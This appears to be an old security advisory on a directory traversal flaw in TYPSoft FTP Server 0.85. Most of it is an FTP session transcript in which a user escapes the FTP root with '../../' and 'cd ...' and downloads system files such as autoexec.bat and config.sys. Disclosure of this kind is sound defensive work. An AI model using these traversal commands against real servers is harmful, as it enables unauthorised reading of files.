COMMAND

    TYPSoft

SYSTEMS AFFECTED

    TYPSoft FTP Server 0.85

PROBLEM

    Joe Testa found following.  A vulnerability exists which allows  a
    remote attacker to break out of the ftp root using relative  paths
    (ie: '...').  The following is an illustration of the problem:

        % ftp localhost
        Connected to xxxxxxxxxx.rh.rit.edu.
        220 TYPSoft FTP Server 0.85 ready...
        User (xxxxxxxxxx.rh.rit.edu:(none)): jdog
        331 Password required for jdog.
        Password:
        230 User jdog logged in.
        ftp> pwd
        257 "/C:/directory/directory/" is current directory.
        ftp> get ../../autoexec.bat
        200 Port command successful.
        150 Opening data connection for ../../autoexec.bat.
        226 Transfer complete.
        ftp: 383 bytes received in 0.06Seconds 6.38Kbytes/sec.
        ftp> cd ..
        501 CWD failed. No permission
        ftp> cd ...
        250 CWD command successful. "/C:/directory/directory/.../" is current directory.
        ftp> pwd
        257 "/C:/directory/directory/.../" is current directory.
        ftp> get config.sys
        200 Port command successful.
        150 Opening data connection for config.sys.
        226 Transfer complete.
        ftp: 89 bytes received in 0.05Seconds 1.78Kbytes/sec.
        ftp>

SOLUTION

    Fix available.